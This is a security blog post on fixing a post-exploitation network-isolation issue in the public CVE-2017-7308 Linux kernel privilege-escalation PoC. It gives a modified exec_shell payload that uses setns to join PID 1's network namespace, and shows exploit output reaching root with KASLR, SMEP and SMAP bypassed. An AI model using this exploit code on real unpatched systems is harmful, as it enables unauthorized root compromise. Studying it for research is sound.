Solving a post exploitation issue with CVE-2017-7308

CVE-2017-7308 is a Linux Kernel vulnerability related to packet sockets. This post focuses on an issue after the exploitation of this bug. For an excellent write-up about on the bug itself and its exploitation, check out Andrey's post on the P0 blog.

The bug itself (CVE-2017-7308) is a signedness issue, which leads to an exploitable heap-out-of-bounds write. It can be triggered by providing specific parameters to the PACKET_RX_RING option on an AF_PACKET socket with a TPACKET_V3 ring buffer version enabled.

The bug affects a kernel if it has AF_PACKET sockets enabled (CONFIG_PACKET=y), which is the case for many Linux kernel distributions but exploitation requires the CAP_NET_RAW capability to be able to create such sockets. In general, this is only available for privileged users. However, it's possible to do that from a user namespace if they are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users.

Andrey provided a PoC in order to demonstrate the exploitation of this vulnerability. If you compile the code and run it, you get a nice shell:

Image
poc1

Great, we got a shell, so far, so good. But here's the thing, I wanted to do some network related stuff after exploitation and found out that I was completely isolated from the real network interfaces. By listing the network interfaces, from the recently spawned shell, we get this:

Image
poc2
 

As seen in the image, we only have the Loopback interface available and can't ping Google. At this point, the immediate questions are: why is this happening and how to solve it?

The first question is answered almost immediately after reading Andre's post, looking at the source and reading the Linux packet socket documentations.

In his code, he creates a new user namespace by calling the unshare function with the CLONE_NEWUSER flag [1]. This way, the calling process is moved into a new user namespace which is not shared with any previously existing process. As said previously, this is a necessary condition for exploitation. Only privileged users have access to the CAP_NET_RAW capability, but unprivileged users inside a new user namespace can create packet sockets, that's why he uses unshare(CLONE_NEWUSER).

Then, a second call to the unshare function is made but this time with the CLONE_NEWNET flag [2]. According to the docs, this flag "Unshare the network namespace, so that the calling process is moved into a new network namespace which is not shared with any previously existing process." Now things are beginning to clear. However, I clearly understood the use of CLONE_NEWUSER but why must the network be isolated? Again, Andrey's post has the answer. Basically, Andrey needed an isolated environment with no interference to send packets with an arbitrary content through the Loopback interface in order to control the out-of-bound overwrite in a reliable way. Doing this in an environment with lots of interfaces and lots of packet data coming and going would have lowered the reliability of the exploit.

Now that we understand the real problem, we must find a way to overcome this situation. The answer is setns. This function is one of the main three functions in the namespace API. According to the docs: "The setns(2) system call allows the calling process to join an existing namespace. The namespace to join is specified via a file descriptor that refers to one of the /proc/[pid]/ns files". There are a few namespaces we can join, however, the one we are interested in is /proc/[pid]/ns/net. This file is a handle for the network namespace of the process. The only thing left is to know which network namespace we must to join. To be more specific, we need to know the PID of the process whose network namespace we want to join.

I decided to join the network namespace from PID 1. This is the PID of the init process in Linux, this is the first process the kernel starts thus it has the biggest privileged processes so I guess it would have access to any network interface in the system. However, we must have some privileges to join this network namespace but that's not a problem for us because we can do it AFTER exploiting the bug and gaining root privileges :)

So, in order to join the network namespace of PID 1, we must obtain a file descriptor for it, we do it this way:

int fd;
 fd = open("/proc/1/ns/net", O_RDONLY);
 

Once we have a file descriptor, we use it in the call to setns and, as a second parameter, we indicate the namespace to join in:

setns(fd, CLONE_NEWNET);
 

In order to test this, I slightly modified the exec_shell function from Andrey's PoC, which is triggered after escalating privileges, this way:

void exec_shell() {
  char *shell = "/bin/bash";
  char *args[] = {shell, "-i", NULL};
 
  int fd;
 
  fd = open("/proc/1/ns/net", O_RDONLY);
  if (fd == -1)
  {
  perror("error opening /proc/1/ns/net");
  exit(EXIT_FAILURE);
  }
 
  if (setns(fd, CLONE_NEWNET) == -1)
  {
  perror("error calling setns");
  exit(EXIT_FAILURE);
  }
  
  execve(shell, args, NULL);
 }
 

After compiling and executing the exploit, here's the result:

fastix@fastix-virtual-machine:~$ gcc cve-2017-7308.c -o exploit
 fastix@fastix-virtual-machine:~$ ./exploit 
 [.] starting
 [.] namespace sandbox set up
 [.] KASLR bypass enabled, getting kernel addr
 [.] done, kernel text: ffffffffb5800000
 [.] commit_creds: ffffffffb58a5cf0
 [.] prepare_kernel_cred: ffffffffb58a60e0
 [.] native_write_cr4: ffffffffb5864210
 [.] padding heap
 [.] done, heap is padded
 [.] SMEP & SMAP bypass enabled, turning them off
 [.] done, SMEP & SMAP should be off now
 [.] executing get root payload 0x55fa39fa7612
 [.] done, should be root now
 [.] checking if we got root
 [+] got r00t ^_^
 root@fastix-virtual-machine:/home/fastix# id
 uid=0(root) gid=0(root) groups=0(root)
 root@fastix-virtual-machine:/home/fastix# ip link list
 1: lo:  mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
  link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 2: ens33:  mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
  link/ether 00:0c:29:98:3b:85 brd ff:ff:ff:ff:ff:ff,multicast,up,lower_up>
 root@fastix-virtual-machine:/home/fastix# ifconfig 
 ens33: flags=4163 mtu 1500
  inet 192.168.1.112 netmask 255.255.255.0 broadcast 192.168.1.255
  inet6 fe80::5cd:ee6f:92b:ccc6 prefixlen 64 scopeid 0x20
  ether 00:0c:29:98:3b:85 txqueuelen 1000 (Ethernet)
  RX packets 69 bytes 9044 (9.0 KB)
  RX errors 0 dropped 0 overruns 0 frame 0
  TX packets 85 bytes 9782 (9.7 KB)
  TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0,broadcast,running,multicast>
 
 lo: flags=73 mtu 65536
  inet 127.0.0.1 netmask 255.0.0.0
  inet6 ::1 prefixlen 128 scopeid 0x10
  loop txqueuelen 1 (Local Loopback)
  RX packets 3329 bytes 206245 (206.2 KB)
  RX errors 0 dropped 0 overruns 0 frame 0
  TX packets 3329 bytes 206245 (206.2 KB)
  TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 root@fastix-virtual-machine:/home/fastix# ping www.google.com 
 PING www.google.com (216.58.202.132) 56(84) bytes of data.
 64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=1 ttl=50 time=52.7 ms
 64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=2 ttl=50 time=54.6 ms
 64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=3 ttl=50 time=51.9 ms
 64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=4 ttl=50 time=53.7 ms
 ^C
 --- www.google.com ping statistics ---
 5 packets transmitted, 4 received, 20% packet loss, time 4008ms
 rtt min/avg/max/mdev = 51.987/53.268/54.686/1.045 ms
 ,loopback,running>,up,lower_up>

As you can see, apart from the loopback interface, now we have the ens33 interface and can connect to the outside world.